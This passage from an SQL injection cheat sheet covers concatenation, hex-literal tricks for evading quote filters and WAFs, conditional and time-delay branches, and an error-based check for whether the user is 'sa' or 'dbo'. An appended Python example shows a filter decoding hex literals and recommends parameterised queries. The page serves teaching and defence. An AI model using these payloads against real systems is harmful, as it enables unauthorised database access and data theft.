These string operations can be quite useful for building injections that do not use any quotes, bypassing other blacklisting, or determining the back-end database.

```sql
SELECT login + '-' + password FROM members
SELECT login || '-' || password FROM members
```

If MySQL is running in ANSI mode, `||` is going to work; otherwise MySQL accepts it as a `logical operator` and it will return 0. A better way to do it in MySQL is using the CONCAT() function.

```sql
SELECT CONCAT(login, password) FROM members
```

Hex values are very useful for bypassing magic_quotes() and similar filters, or even WAFs.

```sql
SELECT 0x5045        -- (M) this is not an integer, it will be a string from hex
SELECT 0x50 + 0x45   -- (M) this is an integer now!
```

`SELECT CASE WHEN condition THEN true-part ELSE false-part END` (P)

```sql
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END
```

`BEGIN IF condition THEN true-part; ELSE false-part; END IF; END;` (O)

```sql
BEGIN IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
```

```sql
IF (1=1) SELECT 'true' ELSE SELECT 'false'
```

If Statement SQL Injection Attack Samples

```sql
IF ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0
```

(S) This will throw a divide by zero error if the current logged-in user is not "sa" or "dbo".
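The hex-literal point above, seen from the filter's side, as an added example that is not part of the original page: a check that looks for quotes or blocked strings in the raw parameter misses a value written as `0x...` unless it decodes the literal first. The blocklist, function names and sample inputs are constructed for illustration.

```python
import re

# MySQL evaluates 0x<hex digits> as a string in string context, so a value
# can reach the query with no quote character for a quote filter to escape.
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")

# Constructed blocklist for the demo; a real filter's list would differ.
BLOCKED_VALUES = ("admin",)


def sql_hex_decode(value):
    """Rewrite each printable 0x.. literal as the quoted string it decodes to."""
    def decode(match):
        raw = bytes.fromhex(match.group(1))
        if all(0x20 <= b < 0x7F for b in raw):
            return "'" + raw.decode("ascii") + "'"
        return match.group(0)  # not printable text: leave the literal alone
    return HEX_LITERAL.sub(decode, value)


def naive_filter_flags(value):
    """Quote/blocklist check on the raw parameter, as a simple filter would do."""
    lowered = value.lower()
    return "'" in value or any(term in lowered for term in BLOCKED_VALUES)


def normalised_filter_flags(value):
    """The same check, run after hex literals have been decoded."""
    return naive_filter_flags(sql_hex_decode(value))


# Constructed sample parameter values (0x5045 is the literal shown on the page).
SAMPLES = ["42", "0x5045", "0x61646d696e", "0x504"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:16} decoded={sql_hex_decode(sample)!r:10} "
              f"naive={naive_filter_flags(sample)} "
              f"normalised={normalised_filter_flags(sample)}")
```

Decoding before inspection narrows this one gap in a filter; binding user input as query parameters, so it is never parsed as SQL, removes the dependence on the filter altogether.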